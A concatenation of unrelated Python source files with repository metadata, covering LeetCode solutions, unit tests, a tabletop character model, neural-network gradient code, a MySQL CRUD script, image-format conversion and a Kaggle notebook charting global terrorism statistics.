#Time complexity: O(log16(n))
#Space complecity: O(1) , excluding o/p
class Solution:
def toHex(self, num: int) -> str:
if num<0:
num = 2**32 + num
if num == 0:
return "0"
res = ""
while num>0:
num, rem = divmod(num, 16)
res = f'{rem if rem<10 else chr(ord("a")+rem%10)}{res}'
return res
|
613cf829ebaa392468005c5e751528d2041aeecb | minialappatt/Python | /file_four_letter_count.py | 969 | 3.890625 | 4 | # -*- coding: utf-8 -*-
"""
Find the count of four letter words from a file
"""
f=open("test.txt","r")
#opening test.txt in read mode
text=f.read()
print("Printing the contents of file\n:")
print(text)
f.close()
f1=open("test.txt","r")
count=0#to store the count of 4 letter words
L=[]#list to store the words
new=""#string new initialized with null
text=f1.read()
for i in text:
#process each character
if i =="\n" or i =="?" or i=="," or i =="." or i==":" or i=="!" or i=="\"" or i=="'":
#checks for newline or punctuations
new=new+" "
#replace space or punctuations with space
else:
new=new+i
#copie the string to new
L=new.split(" ")#split returns a list
#L contains each word
#print(L)
for j in L:
#process each list element
if len(j)==4:
#checks for 4 letter count
count+=1#increments count
print("The count of four letter words is:",count)
f1.close()
|
9dc7220b6ce4c711f3bd4916621ce730f2d6bc8c | daniel-reich/ubiquitous-fiesta | /NpJMkLRfApRCK7Js6_24.py | 111 | 3.5625 | 4 |
def is_palindrome(wrd):
if len(wrd)<=1:return True
return wrd[0] == wrd[-1] and is_palindrome(wrd[1:-1])
|
8d9e05dc23f2c7663aadd7e2233d3276e048c344 | Ferretsroq/Brute-Justice | /Characters.py | 6,225 | 3.890625 | 4 | from enum import Enum
import random
import skills
import BruteJusticeSpreadsheets
class Stat(Enum):
"""Simple Enum for identifying stat pools"""
Might = 0
Speed = 1
Intellect = 2
class Weapon(Enum):
"""Simple Enum for identifying how much damage a weapon deals"""
Light = 2
Medium = 4
Heavy = 6
class Pool:
"""Class that holds methods relating to a character's pool"""
def __init__(self, current=0, maximum=0, edge=0):
"""Define the max of the pool, current value, and the character's edge"""
self.max = maximum
self.current = current
self.edge = edge
def __repr__(self):
return "{}/{}".format(self.current, self.max)
def reduce(self, amount):
"""Reduce the pool by the specified amount. If there is not enough to redue,
instead return the remainder to reduce from the next pool."""
if(self.current > 0):
difference = self.current - amount
if(difference >= 0):
self.current -= amount
return 0
else:
self.current = 0
return abs(difference)
else:
return amount
def increase(self, amount):
"""Increase the pool by the specified amount, capped to the maximum value."""
if(self.current < self.max):
self.current += amount
self.current = min(self.current, self.max)
def effort(self, num):
"""Spend effort from the pool, taking edge into account"""
spent = max(0, (num*3) - self.edge)
if(spent <= self.current):
self.reduce(spent)
return True
else:
print("Not enough to spend {} effort.\nCurrent: {}\nRequired: {}".format(num, self.current, spent))
return False
class Character:
"""Holds information about a character."""
def __init__(self, name='',
mightCurrent=0,
speedCurrent=0,
intellectCurrent=0,
mightMax=0,
speedMax=0,
intellectMax=0,
mightEdge=0,
speedEdge=0,
intellectEdge=0,
inputSkills = [],
weapon = Weapon.Light):
"""Initialize the character pools, skills, and weapon damage"""
self.name = name
self.might = Pool(mightCurrent, mightMax, mightEdge)
self.speed = Pool(speedCurrent, speedMax, speedEdge)
self.intellect = Pool(intellectCurrent, intellectMax, intellectEdge)
self.adventureSkills = []
self.combatSkills = []
self.craftingSkills = []
self.numeneraSkills = []
self.socialSkills = []
for skill in inputSkills:
if(skills.isSkill(skill)):
if(skills.isAdventuringSkill(skill)):
self.adventureSkills.append(skill)
elif(skills.isCombatSkill(skill)):
self.combatSkills.append(skill)
elif(skills.isCraftingSkill(skill)):
self.craftingSkills.append(skill)
elif(skills.isNumeneraSkill(skill)):
self.numeneraSkills.append(skill)
elif(skills.isSocialSkill(skill)):
self.socialSkills.append(skill)
self.skills = self.adventureSkills + \
self.combatSkills + \
self.craftingSkills + \
self.numeneraSkills + \
self.socialSkills
self.weapon = weapon
def roll(self):
"""Roll 1d20"""
return random.randint(1,20)
def Challenge(self, level=0, skills=[], stat=Stat.Might, effort=0, assets=0):
"""Apply effort and relevant skills, then roll 1d20 to resolve a task"""
skillCounter = 0
for skill in skills:
if skill in self.skills:
skillCounter += 1
if(self.Effort(stat, effort)):
target = (level - skillCounter - effort - assets)*3
else:
target = (level - skillCounter - assets)*3
print('Target number: {}'.format(target))
if(target <= 0):
return True
else:
roll = self.roll()
print('{} rolled {}.'.format(self.name, roll))
return roll >= target
def Effort(self, stat=Stat.Might, num=1):
"""Apply effort to the relevant pool"""
if(stat == Stat.Might):
return self.might.effort(num)
elif(stat == Stat.Speed):
return self.speed.effort(num)
elif(stat == Stat.Intellect):
return self.intellect.effort(num)
def isDead(self):
"""Report whether or not the character is dead"""
return self.might.current==0 and \
self.speed.current == 0 and \
self.intellect.current == 0
def Attack(self, creature, stat=Stat.Speed, effort=0, assets=0):
"""Special case of Challenge, to target a specific creature"""
print('{} attacks {}.'.format(self.name, creature.name))
result = self.Challenge(level=creature.level, skills=['{} Attack'.format(stat.name), '{} Weapons'.format(self.weapon.name)], effort=effort, assets=assets)
if(result):
creature.hp -= self.weapon.value
def TakeDamage(self, damage):
self.intellect.reduce(self.speed.reduce(self.might.reduce(damage)))
def __repr__(self):
adventuring = 'ADVENTURING SKILLS:\n' + '\n'.join(self.adventureSkills) + '\n'
combat = '\nCOMBAT SKILLS:\n' + '\n'.join(self.combatSkills) + '\n'
crafting = '\nCRAFTING SKILLS:\n' + '\n'.join(self.craftingSkills) + '\n'
numenera = '\nNUMENERA SKILLS:\n' + '\n'.join(self.numeneraSkills) + '\n'
social = '\nSOCIAL SKILLS:\n' + '\n'.join(self.socialSkills) + '\n'
skills = '\n' + adventuring + combat + crafting + numenera + social
return "Name: {}\nMight: {}\nSpeed: {}\nIntellect: {}\nSkills: {}".format(self.name, self.might, self.speed, self.intellect, skills)
def LoadCharacter(sheetID):
data = BruteJusticeSpreadsheets.ReadSpreadsheet(['Info', 'Pools', 'Skills'], sheetID)
info = data[0]
pools = data[1]
skillsData = data[2]
name = info[0][1]
descriptor = info[1][1]
focus = info[2][1]
mightCurrent = int(pools[0][1])
speedCurrent = int(pools[1][1])
intellectCurrent = int(pools[2][1])
mightMax = int(pools[0][2])
speedMax = int(pools[1][2])
intellectMax = int(pools[2][2])
mightEdge = int(pools[0][3])
speedEdge = int(pools[1][3])
intellectEdge = int(pools[2][3])
skillsList = []
for skill in skillsData:
if skills.isSkill(skill[0]):
skillsList.append(skill[0])
return Character(name=name,
mightCurrent=mightCurrent,
speedCurrent=speedCurrent,
intellectCurrent=intellectCurrent,
mightMax=mightMax,
speedMax=speedMax,
intellectMax=intellectMax,
mightEdge=mightEdge,
speedEdge=speedEdge,
intellectEdge=intellectEdge,
inputSkills=skillsList)
|
783758c6ad53cd9d0c5ee7c79e1ee7981c683645 | MatNoble/leetcode | /LeetCodeSolutions/503.py | 802 | 3.546875 | 4 | #==================================================
#==> Title: next-greater-element-ii
#==> Author: Zhang zhen
#==> Email: hustmatnoble.gmail.com
#==> GitHub: https://github.com/MatNoble
#==> Date: 1/15/2021
#==================================================
"""
https://leetcode-cn.com/problems/next-greater-element-ii/
"""
class Solution:
def nextGreaterElements(self, nums):
n = len(nums)
res = [-1] * n
stack = []
for i in range(2*n-1, -1, -1):
while len(stack) != 0 and nums[stack[-1]] <= nums[i % n]:
stack.pop()
if len(stack) != 0:
res[i % n] = nums[stack[-1]]
stack.append(i % n)
return res
nums = [1,2,1]
mat = Solution()
mat.nextGreaterElements(nums)
|
d55533841b8cadf02d6be11cf7affc16eb2d305c | MiroVatov/Python-SoftUni | /Python Fundamentals 2020 - 2021/03 - LISTS BASIC/Exercose 04 - 01 ver 2.py | 104 | 3.5625 | 4 | nums_str = input().split()
nums = []
for num in nums_str:
nums.append(-int(num))
print(nums) |
ff708a0dd6c1c95faf199f8826a581b5ca349be3 | HarikrishnaRayam/Data-Structure-and-algorithm-python | /Linked List -2/lectures/midpoint of linked list.py | 1,598 | 3.59375 | 4 | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 14 16:18:38 2020
@author: cheerag.verma
"""
class Node:
def __init__(self,data):
self.data = data
self.next = None
def createLL(arr):
if len(arr) == 0:
return None
head = Node(arr[0])
tail = head
for data in arr[1:]:
tail.next = Node(data)
tail = tail.next
return head
# def calcLenght(head):
# if head.next is None:
# return 1
# #smallHead = calcLenght(head.next)
# return 1 + calcLenght(head.next)
def calcLenght(head):
count = 0
current = head
while current is not None:
current = current.next
count+=1
return count
def midPointLL(head):
if head.next is None:
return head.data
l = calcLenght(head)
current = head
mid = l//2
count = 1
while current is not None:
if count == mid:
break
else:
current = current.next
count+=1
if l%2 ==0 :
return current.data
else:
return current.next.data
def midPointLL2(head):
slow = head
fast = head
while fast.next is not None and fast.next.next is not None:
slow = slow.next
fast = fast.next.next
return slow
arr = list(map(int,input().split()))
head = createLL(arr[:-1])
#node = midPointLL(head)
print("using slow and fast pointer")
node = midPointLL2(head)
if node:
print(node.data)
|
60831729f58dc649fa5cefbd16fef9264041e824 | sanathkumarbs/coding-challenges | /recursion/basic/fibonacci.py | 912 | 4.0625 | 4 | """Fibonacci.
The fibonacci sequence is a famous bit of mathematics, and it
happens to have a recursive definition. The first two values
in the sequence are 0 and 1 (essentially 2 base cases).
Each subsequent value is the sum of the previous two values,
so the whole sequence is: 0, 1, 1, 2, 3, 5, 8, 13, 21 and so on.
Define a recursive fibonacci(n) method that returns the nth
fibonacci number, with n=0 representing the start of the sequence.
fibonacci(0) > 0
fibonacci(1) > 1
fibonacci(2) > 1
fibonacci(8) > 21
http://codingbat.com/prob/p120015
"""
def fibonacci(n):
if n == 0:
return 0
if n == 1:
return 1
return fibonacci(n-1) + fibonacci(n-2)
def test_fibonacci_one():
assert(fibonacci(0)==0)
def test_fibonacci_two():
assert(fibonacci(1)==1)
def test_fibonacci_three():
assert(fibonacci(2)==1)
def test_fibonacci_four():
assert(fibonacci(8)==21)
|
c19015df485e35d4baf9a1ef444332d7247e9dcb | narasimhareddyprostack/Ramesh-CloudDevOps | /Basics/one.py | 264 | 4.0625 | 4 | x = int(input('Pls Enter Value'))
print(x+10)
#input function read data/input at the run time
#always string only
#The input() function is used in both the version of Python 2.x and Python 3.x.
# how to read multiple values in single line
# command line args
|
544b294a3da3f61dab2e56283ab4558a3adefa43 | tkhunlertkit/cs361f18 | /Lab 4/samRationalMethods.py | 718 | 3.71875 | 4 | import unittest
from rational import Rational
class SamRationalMethods(unittest.TestCase):
# Sam
def test_zero(self):
# test if zero times zero
zero = Rational(0,1)
new = zero*zero
self.assertEqual(new.n, 0)
self.assertEqual(new.d, 1)
# Sam
def test_neg(self):
#make sure multiply by negative comes out correctly
neg = Rational(-1,1)
mult = neg*(neg)
self.assertEqual(mult.n, -1)
self.assertEqual(mult.d, 1)
# Sam
def test_float(self):
#test if rational floated is not instance of int or string
res = Rational()
self.assertFalse(isinstance(float(res), int))
self.assertFalse(isinstance(float(res), str))
|
e2504e2954cbe80f1826e09b27e5d8b676e6b78b | wryoung412/cs224n_nlp | /assignment1/q2_neural.py | 5,910 | 3.65625 | 4 | #!/usr/bin/env python
import numpy as np
import random
from q1_softmax import softmax, softmax_grad
from q2_sigmoid import sigmoid, sigmoid_grad
from q2_gradcheck import gradcheck_naive
def forward_backward_prop(X, labels, params, dimensions, debug=False):
"""
Forward and backward propagation for a two-layer sigmoidal network
Compute the forward propagation and for the cross entropy cost,
the backward propagation for the gradients for all parameters.
Notice the gradients computed here are different from the gradients in
the assignment sheet: they are w.r.t. weights, not inputs.
Arguments:
X -- M x Dx matrix, where each row is a training example x.
labels -- M x Dy matrix, where each row is a one-hot vector.
params -- Model parameters, these are unpacked for you.
dimensions -- A tuple of input dimension, number of hidden units
and output dimension
"""
### Unpack network parameters (do not modify)
ofs = 0
Dx, H, Dy = (dimensions[0], dimensions[1], dimensions[2])
W1 = np.reshape(params[ofs:ofs+ Dx * H], (Dx, H))
ofs += Dx * H
b1 = np.reshape(params[ofs:ofs + H], (1, H))
ofs += H
W2 = np.reshape(params[ofs:ofs + H * Dy], (H, Dy))
ofs += H * Dy
b2 = np.reshape(params[ofs:ofs + Dy], (1, Dy))
# Note: compute cost based on `sum` not `mean`.
### YOUR CODE HERE: forward propagation
z1 = np.matmul(X, W1) + b1
h = sigmoid(z1)
# This is misleading. b2 is only a row vector, Broadcasting did the magic.
# The real formula is
# z2 = np.matmul(h, W2) + ones(n, 1) * b2
#
# When pretending z2 = np.matmul(h, W2) + eye(n) * b2, dim(gradb2) = M * dim(b2).
# So gradW1 is correct, but gradb1 messed up the padding...
z2 = np.matmul(h, W2) + b2
y = softmax(z2)
cost = -np.sum(labels * np.log(y))
### END YOUR CODE
### YOUR CODE HERE: backward propagation
grady = - labels / y
gradz2 = softmax_grad(y, grady)
# softmax_grad is tricky and requires grady.
# When grady is from the cross entropy loss with unique labels, the gradient
# has a scalar form.
assert np.all(np.sum(labels, 1) == 1)
assert np.allclose(gradz2, y - labels, rtol=1e-05, atol=1e-06)
# Suppose z = f(y), y = g(x). Then dz/dx = dy/dx * dz/dy.
# Notice the multiplication order.
gradW2 = np.matmul(h.T, gradz2)
gradb2 = np.sum(gradz2, 0)
gradh = np.matmul(gradz2, W2.T)
gradz1 = sigmoid_grad(h) * gradh
gradW1 = np.matmul(X.T, gradz1)
gradb1 = np.sum(gradz1, 0)
### END YOUR CODE
### Stack gradients (do not modify)
grad = np.concatenate((gradW1.flatten(), gradb1.flatten(),
gradW2.flatten(), gradb2.flatten()))
if debug:
print('params', params.shape, params)
print('grad', grad.shape, grad)
return cost, grad
def forward_backward_prop_ref(data, labels, params, dimensions, debug=False):
"""
Forward and backward propagation for a two-layer sigmoidal network
Compute the forward propagation and for the cross entropy cost,
and backward propagation for the gradients for all parameters.
Arguments:
data -- M x Dx matrix, where each row is a training example.
labels -- M x Dy matrix, where each row is a one-hot vector.
params -- Model parameters, these are unpacked for you.
dimensions -- A tuple of input dimension, number of hidden units
and output dimension
"""
### Unpack network parameters (do not modify)
ofs = 0
Dx, H, Dy = (dimensions[0], dimensions[1], dimensions[2])
W1 = np.reshape(params[ofs:ofs+ Dx * H], (Dx, H))
ofs += Dx * H
b1 = np.reshape(params[ofs:ofs + H], (1, H))
ofs += H
W2 = np.reshape(params[ofs:ofs + H * Dy], (H, Dy))
ofs += H * Dy
b2 = np.reshape(params[ofs:ofs + Dy], (1, Dy))
### YOUR CODE HERE: forward propagation
h = sigmoid(np.dot(data,W1) + b1)
yhat = softmax(np.dot(h,W2) + b2)
### END YOUR CODE
### YOUR CODE HERE: backward propagation
cost = np.sum(-np.log(yhat[labels==1]))
d3 = (yhat - labels)
gradW2 = np.dot(h.T, d3)
gradb2 = np.sum(d3,0,keepdims=True)
if debug:
print('ref gradW2', gradW2)
if debug:
print('ref gradb2', gradb2)
dh = np.dot(d3,W2.T)
grad_h = sigmoid_grad(h) * dh
gradW1 = np.dot(data.T,grad_h)
gradb1 = np.sum(grad_h,0)
### END YOUR CODE
### Stack gradients (do not modify)
grad = np.concatenate((gradW1.flatten(), gradb1.flatten(),
gradW2.flatten(), gradb2.flatten()))
return cost, grad
def sanity_check():
"""
Set up fake data and parameters for the neural network, and test using
gradcheck.
"""
print "Running sanity check..."
N = 20
dimensions = [10, 5, 10]
## debug with small dimensions
# N = 2
# dimensions = [3, 1, 2]
data = np.random.randn(N, dimensions[0]) # each row will be a datum
labels = np.zeros((N, dimensions[2]))
for i in xrange(N):
labels[i, random.randint(0,dimensions[2]-1)] = 1
params = np.random.randn((dimensions[0] + 1) * dimensions[1] + (
dimensions[1] + 1) * dimensions[2], )
gradcheck_naive(lambda params:
forward_backward_prop(data, labels, params, dimensions), params)
# gradcheck_naive(lambda params, debug=False:
# forward_backward_prop_ref(data, labels, params, dimensions, debug), params)
def your_sanity_checks():
"""
Use this space add any additional sanity checks by running:
python q2_neural.py
This function will not be called by the autograder, nor will
your additional tests be graded.
"""
print "Running your sanity checks..."
### YOUR CODE HERE
print "No test added..."
### END YOUR CODE
if __name__ == "__main__":
sanity_check()
your_sanity_checks()
|
a41395f9a46a002d25512c614866325203a06a36 | lzchub/iPython-scripts | /mysql.py | 3,628 | 3.96875 | 4 | """
author by chuan
2020-08-04
实现数据库的连接,增删改查等操作
"""
import pymysql
"""
Insert操作
"""
def insert_sql(name,sex):
# 1.创建连接对象
conn = pymysql.connect(host='192.168.100.100',
port=3306,
user='admin',
password='admin',
db='school',
charset='utf8')
try:
# 获取游标对象
with conn.cursor() as cursor:
# 执行SQL得到结果
result = cursor.execute('insert into tb_student(stuname,stusex) values(%s,%s)',(name,sex))
if result == 1:
print("添加成功")
# 操作成功执行提交
conn.commit()
except pymysql.MySQLError as error:
print(error)
# 操作失败,执行回滚
conn.rollback()
finally:
# 关闭连接释放资源
conn.close()
"""
delete操作
"""
def delete_sql(id):
# 1.创建连接对象
conn = pymysql.connect(host='192.168.100.100',
port=3306,
user='admin',
password='admin',
db='school',
charset='utf8')
try:
# 2.获取游标对象
with conn.cursor() as cursor:
# 3.执行SQL得到结果
result = cursor.execute('delete from tb_student where stuid=%s',(id))
if result == 1:
print("删除成功")
# 4.操作成功执行提交
conn.commit()
except pymysql.MySQLError as error:
print(error)
# 5.操作失败,执行回滚
conn.rollback()
finally:
# 6.关闭连接释放资源
conn.close()
"""
update
"""
def update_sql(id,name,sex):
# 1.创建连接对象
conn = pymysql.connect(host='192.168.100.100',
port=3306,
user='admin',
password='admin',
db='school',
charset='utf8')
try:
# 获取游标对象
with conn.cursor() as cursor:
# 执行SQL得到结果
result = cursor.execute('update tb_student set stuname=%s,stusex=%s where stuid=%s',(name,sex,id))
if result == 1:
print("更新成功")
# 操作成功执行提交
conn.commit()
except pymysql.MySQLError as error:
print(error)
# 操作失败,执行回滚
conn.rollback()
finally:
# 关闭连接释放资源
conn.close()
"""
select操作
"""
def select_sql(id):
# 1.创建连接对象
conn = pymysql.connect(host='192.168.100.100',
port=3306,
user='admin',
password='admin',
db='school',
charset='utf8')
try:
# 获取游标对象
with conn.cursor() as cursor:
# 执行SQL得到结果
cursor.execute('select * from tb_student where stuid=%s', (id))
print(cursor.fetchall()) # fetchone fetchmany
except pymysql.MySQLError as error:
print(error)
finally:
# 关闭连接释放资源
conn.close()
if __name__ == '__main__':
# insert_sql('张无忌',1)
# delete_sql(1014)
# update_sql(1001,'金毛丝王',1)
select_sql(1001)
|
8cf1b746b526e1cd7d77a4cebf34f679ab9da20e | ftlka/problems | /leetcode/largest-number/solution.py | 340 | 3.515625 | 4 | from functools import cmp_to_key
def largestNumber(nums):
res = [str(num) for num in nums]
comp = lambda a, b: 1 if a + b < b + a else -1
sorted_str = ''.join(sorted(res, key=cmp_to_key(comp)))
# for zeros
while sorted_str[0] == '0' and len(sorted_str) != 1:
sorted_str = sorted_str[1:]
return sorted_str |
3770612c99a4bc1f523406526c34b65cf6da45a1 | DEEPTHA26/python | /1.py | 100 | 3.8125 | 4 | d5=int(input())
if(d5>0):
print("Positive")
elif(d5<0):
print("Negative")
else:
print("Zero")
|
48e586e2d2fa5b7a0f083ae48196de79b279574f | eli719/pyprojects | /changImageFormat.py | 1,226 | 3.5 | 4 | from PIL import Image
image = Image.open('3.jpg') # type:Image.Image
print(image)
image = image.convert('RGB') # P->RGB
image = image.save('p_3.jpg')
image = Image.open('p_3.jpg')
print(image)
def changFormat(type):
print(image.getpixel((0, 0)))
im = image.convert(type)
im.save('lena_' + type + '_1.jpg')
print(im)
print(im.getpixel((0, 0)))
# im.show()
'''
模式“1”为二值图像,非黑即白。但是它每个像素用8个bit表示,0表示黑,255表示白。下面我们将lena图像转换为“1”图像
'''
changFormat('1')
'''
模式“L”为灰色图像,它的每个像素用8个bit表示,0表示黑,255表示白,其他数字表示不同的灰度。在PIL中,从模式“RGB”转换为“L”模式是按照下面的公式转换的:
L = R * 299/1000 + G * 587/1000+ B * 114/1000
'''
# changFormat('L')
'''
模式“P”为8位彩色图像,它的每个像素用8个bit表示,其对应的彩色值是按照调色板查询出来的。
'''
# print(image.getpixel((0, 0)))
# image = image.convert('P')
# # image.save('lena_' + 'P' + '.png')
# print(image)
# print(image.getpixel((0, 0)))
# image.show()
# changFormat('P')
|
b6d6c7b3dd31f138f71c313d5b9396f99f240789 | TaylorWx/shiyanlou | /python/math.py | 540 | 3.984375 | 4 | #!/usr/bin/env python3
n=int(input("enter the value of n: "))
print("enter values for the matria A")
a=[]
for i in range(n):
a.append([ int (x) for x in input().split()])
print("enter values for the Matri B")
b=[]
for i in range(n):
b.append([int(x) for x in input().split()])
c=[]
for i in range(n):
c.append(a[i][j] * b[i][j] for j in range(n))
print("after matrix multiplication")
print(" _"*7*n)
for x in c:
for y in x:
print(str(y).rjust(5), end=' ')
print()
print("_" *7 *n)
|
2875c8c045f3e51212bd05e08602cc05bf82b305 | khoch/line-alg-python- | /main.py | 709 | 3.703125 | 4 | from display import *
from draw import *
screen = new_screen()
x = -1
x1 = 0
while (x <= 1):
draw_line(screen, int(250*x)+250, int(250*x*x*x)+250, int(250*x1)+250, int(250*x1*x1*x1)+250, [255, 255, 255] )
draw_line(screen, int(-250*x)+250, int(250*x*x*x)+250, int(-250*x1)+250, int(250*x1*x1*x1)+250, [255, 255, 255] )
x += 0.016
x1 += 0.016
"""
x = 0
y = 0
while (y<500):
draw_line(screen, 250, 250, x, y, [255, 255, 255] )
y += 50
while (x<500):
draw_line(screen, 250, 250, x, y, [255, 255, 255] )
x += 50
while (y>0):
draw_line(screen, 250, 250, x, y, [255, 255, 255] )
y -= 50
while (x>0):
draw_line(screen, 250, 250, x, y, [255, 255, 255] )
x -= 50
""" |
aaa239bdf7e0f21c3b6976524901b1bc6bec0199 | bmugenya/hillCypher | /encrypt.py | 1,581 | 3.8125 | 4 | class Cipher():
def __init__(self):
self.keyMatrix = [[0] * 3 for i in range(3)]
# Generate vector for the message
self.messageVector = [[0] for i in range(3)]
# Generate vector for the cipher
self.cipherMatrix = [[0] for i in range(3)]
# Following function generates the
# key matrix for the key string
def getKeyMatrix(self,key):
k = 0
for i in range(3):
for j in range(3):
self.keyMatrix[i][j] = ord(key[k]) % 65
k += 1
# Following function encrypts the message
def encrypt(self,messageVector):
for i in range(3):
for j in range(1):
self.cipherMatrix[i][j] = 0
for x in range(3):
self.cipherMatrix[i][j] += (self.keyMatrix[i][x] *
self.messageVector[x][j])
self.cipherMatrix[i][j] = self.cipherMatrix[i][j] % 26
def HillCipher(self,message, key):
# Get key matrix from the key string
self.getKeyMatrix(key)
# Generate vector for the message
for i in range(3):
self.messageVector[i][0] = ord(message[i]) % 65
# Following function generates
# the encrypted vector
self.encrypt(self.messageVector)
# Generate the encrypted text
# from the encrypted vector
CipherText = []
for i in range(3):
CipherText.append(chr(self.cipherMatrix[i][0] + 65))
# Finally print the ciphertext
return CipherText
|
05de4b1727fe44761f8ce6baf021e3d3bb0ffe54 | StevenLOL/kaggleScape | /data/script758.py | 33,841 | 3.546875 | 4 |
# coding: utf-8
# Through this notebook I will try to explore past incidents of Terrorist acts and will try to find out the reason behind these acts.<br>
# What could be the reasons behind these acts ?
#
# CAUSES AND MOTIVATIONS
# ---
# Although people resort to terrorism for a number of reasons, experts attribute most acts of violence to three major factors:<br><br>
# **Political:** People choose terrorism when they are trying to right what they perceive to be a social or political or historical wrong—when they have been stripped of their land or rights, or denied these.<br><br>
# **Religious:**perhaps the most commonly held belief today is that terrorism is caused by religion. Though it is not the main cause for terrorism, religion does play a significant role in driving some forms of it. Many terrorist get wrong understanding in religion<br><br>
# **Socioeconomic:** Various forms of deprivation can drive people to terrorism, in particular, poverty, lack of education, or lack of political freedom.
#
#
# **The World** | | **Terrorism**
# ------------- |------------- | -------------
#  |**VS** |
#
# In[ ]:
import matplotlib.pyplot as plt
import matplotlib
import plotly.plotly as py
import plotly.graph_objs as go
from plotly.offline import download_plotlyjs,init_notebook_mode,plot,iplot
init_notebook_mode(connected=True)
import seaborn as sns
import numpy as np
import pandas as pd
import numpy as np
import random as rnd
import re
import io
from sklearn.metrics import confusion_matrix
import seaborn as sns
import matplotlib.gridspec as gridspec
from sklearn.preprocessing import StandardScaler
from numpy import genfromtxt
from scipy.stats import multivariate_normal
from sklearn.metrics import f1_score
from sklearn.metrics import recall_score , average_precision_score
from sklearn.metrics import precision_score, precision_recall_curve
import string
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from wordcloud import WordCloud, STOPWORDS
get_ipython().run_line_magic('matplotlib', 'inline')
from mpl_toolkits.basemap import Basemap
from matplotlib import animation, rc
from IPython.display import HTML
import warnings
warnings.filterwarnings('ignore')
import base64
from IPython.display import HTML, display
import warnings
warnings.filterwarnings('ignore')
from scipy.misc import imread
import codecs
from subprocess import check_output
import folium
from folium import plugins
from folium.plugins import HeatMap
# Import the dataset and take a quick look
# In[ ]:
terror=pd.read_csv('../input/globalterrorismdb_0617dist.csv',encoding='ISO-8859-1');
terror.head(5)
# Lets first sweep through all the variables helping us draw insights on attack types , Weapon types and who are the targets.
# ---
# Attack Types
# ---
# In[ ]:
plt.figure(figsize=(8,10))
gs = gridspec.GridSpec(3, 1)
v_features = ['attacktype1_txt','attacktype2_txt','attacktype3_txt']
for i, cn in enumerate(terror[v_features]):
ax = plt.subplot(gs[i])
sns.barplot( y = terror[cn].value_counts().index,
x = terror[cn].value_counts().values,
palette="GnBu_d")
ax.set_ylabel('')
ax.set_title( str(cn)[0:11] )
# Weapons used
# ---
# In[ ]:
plt.figure(figsize=(6,16))
gs = gridspec.GridSpec(4, 1)
v_features = ['weaptype1_txt','weaptype2_txt','weaptype3_txt','weaptype4_txt']
for i, cn in enumerate(terror[v_features]):
ax = plt.subplot(gs[i])
sns.barplot( y = terror[cn].value_counts().index,
x = terror[cn].value_counts().values,
palette="GnBu_d")
ax.set_ylabel('')
ax.set_title( str(cn)[0:9] )
# Who are affected?
# ---
# In[ ]:
plt.figure(figsize=(6,16))
gs = gridspec.GridSpec(3, 1)
v_features = ['targtype1_txt','targtype2_txt','targtype3_txt']
for i, cn in enumerate(terror[v_features]):
ax = plt.subplot(gs[i])
sns.barplot( y = terror[cn].value_counts().index,
x = terror[cn].value_counts().values,
palette="GnBu_d")
ax.set_ylabel('')
ax.set_title( str(cn)[0:9] )
# 2 major attack types are Bombing/Explosion and Armed Assaults which indicates the misuse of science and technolgy against Humanity
# ---
# and Who has sufferred the most ?
# > Citizens :- Seeing your loved one die because of terror attack can either incite passion among the youngsters to avenge the kiling or it leads to disintegration of society<br><br>
# Lets take a look at the countries whose Citizens has seen these violent acts of terror the most
# ----
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror_filter.groupby(['country_txt'])['targtype1_txt'].count()
data = dict(
type = 'choropleth',
locations = terror_filter.index,
locationmode = 'country names',
z = terror_filter.values,
text = terror_filter.index,
colorbar = {'title': 'No of incidents'})
layout = dict( title = 'No of incidents across the world to disrupt Private Citizens & Property',
geo = dict(showframe = False,
projection = {'type' : 'Mercator'}))
choromap3 = go.Figure(data = [data],layout=layout)
iplot(choromap3)
# India , Pakistan and Afganistan has seen thousands of terrorists act which is a worrying factor
# ----
# Terrorist Acts against Military
# ---
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Military"]
terror_filter = terror_filter.groupby(['country_txt'])['targtype1_txt'].count()
data = dict(
type = 'choropleth',
locations = terror_filter.index,
locationmode = 'country names',
z = terror_filter.values,
text = terror_filter.index,
colorbar = {'title': 'No of incidents'})
layout = dict( title = 'No of incidents across the world to oppose their own Military',
geo = dict(showframe = False,
projection = {'type' : 'Mercator'}))
choromap3 = go.Figure(data = [data],layout=layout)
iplot(choromap3)
# Terrorist Acts against Police
# ---
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Police"]
terror_filter = terror_filter.groupby(['country_txt'])['targtype1_txt'].count()
data = dict(
type = 'choropleth',
locations = terror_filter.index,
locationmode = 'country names',
z = terror_filter.values,
text = terror_filter.index,
colorbar = {'title': 'No of incidents'})
layout = dict( title = 'No of incidents across the world to oppose Police',
geo = dict(showframe = False,
projection = {'type' : 'Mercator'}))
choromap3 = go.Figure(data = [data],layout=layout)
iplot(choromap3)
# **Time Series analysis for target Types in Top 10 countries**
# ---
# > Time Series analysis for target Type:- Private Citizens & Property
# ---
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Private Citizens & Property"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['targtype1_txt'].count().unstack()
#terror_filter.columns.name = None
#terror_filter = terror_filter.reset_index()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 10))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# > Time Series analysis for target Type:- Military
# ---
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Military"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['targtype1_txt'].count().unstack()
#terror_filter.columns.name = None
#terror_filter = terror_filter.reset_index()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 10))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
# > Time Series analysis for target Type:- Police
# ---
# In[ ]:
terror_filter = terror[terror['targtype1_txt'] == "Police"]
terror_filter = terror_filter.groupby(['country_txt','iyear'])['targtype1_txt'].count().unstack()
#terror_filter.columns.name = None
#terror_filter = terror_filter.reset_index()
terror_filter = terror_filter.sort_values([2016], ascending=False)
terror_filter = terror_filter.fillna(0)
f, ax = plt.subplots(figsize=(15, 10))
g = sns.heatmap(terror_filter[0:10],cmap='YlGnBu',linewidths=.5,vmin=0.01)
plt.show()
